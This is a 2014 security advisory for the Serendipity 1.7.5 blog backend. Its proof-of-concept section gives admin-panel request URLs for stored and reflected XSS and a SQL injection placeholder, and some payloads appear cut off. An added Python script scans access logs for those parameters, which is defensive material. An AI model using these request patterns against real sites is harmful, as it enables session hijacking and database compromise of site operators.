Advisory: Serendipity 1.7.5 - Multiple security vulnerabilities
Advisory ID: SSCHADV2014-003
Author: Stefan Schurtz
Affected Software: Successfully tested on Serendipity 1.7.5
Vendor URL: http://www.s9y.org/
Vendor Status: fixed

==========================
Vulnerability Description
==========================

The Serendipity 1.7.5 backend is prone to multiple security vulnerabilities.

==========================
PoC-Exploit
==========================

// Stored-XSS with "Real name"

(1) Log in as a "Standard editor" user
(2) Under "Personal Settings" set your "Real name" to ">

The XSS will be executed for the Administrator if he manages the users (Backend -> Administration -> Manage users)

// SQL-Injection - with "serendipity[install_plugin]"

http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=serendipity_event_spamblock&serendipity[install_plugin]=[SQLi]

// Reflected XSS_1 - "serendipity[install_plugin]"

http://[target]/s/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=&serendipity[install_plugin]=78524'%3b%2f%2f912

// Reflected XSS_2 - "serendipity[id]"

POST http://[target]/serendipity/serendipity_admin.php?
serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=">
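
==========================
Added example: log review
==========================

The following is an added example, not part of the original advisory and not Serendipity code: a Python check that reviews web server access logs for requests to serendipity_admin.php in which the parameters named above carry unexpected characters. The expected value formats (plugin names made of letters, digits and underscores; a numeric serendipity[id]) and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: plugin identifiers look like the advisory's
# "serendipity_event_spamblock" (letters, digits, underscore).
PLUGIN_NAME = re.compile(r"[A-Za-z0-9_]+")
# Assumption: serendipity[id] is a numeric entry id.
ENTRY_ID = re.compile(r"[0-9]+")
RULES = {
    "serendipity[install_plugin]": PLUGIN_NAME,
    "serendipity[pluginPath]": PLUGIN_NAME,
    "serendipity[id]": ENTRY_ID,
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')

def suspicious_params(log_line):
    """Return [(param, decoded value)] that break the expected format."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/serendipity_admin.php"):
        return []
    hits = []
    # parse_qsl percent-decodes names and values, so
    # serendipity%5Bid%5D and serendipity[id] are treated alike.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        rule = RULES.get(name)
        if rule and value and not rule.fullmatch(value):
            hits.append((name, value))
    return hits

# Constructed sample log lines (combined log format, documentation IP).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2014:10:00:00 +0000] "GET /serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=serendipity_event_spamblock&serendipity[install_plugin]=serendipity_event_spamblock HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2014:10:00:05 +0000] "GET /serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=&serendipity[install_plugin]=78524\'%3b%2f%2f912 HTTP/1.1" 200 4890',
    '192.0.2.10 - - [01/Jan/2014:10:00:09 +0000] "POST /serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=entries&serendipity%5Bid%5D=5%22 HTTP/1.1" 200 4711',
]

def scan(lines):
    """Map line index -> findings, for lines with at least one finding."""
    return {i: h for i, line in enumerate(lines) if (h := suspicious_params(line))}

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

Parameters sent in a POST body do not appear in standard access logs, so this check only covers values carried in the query string.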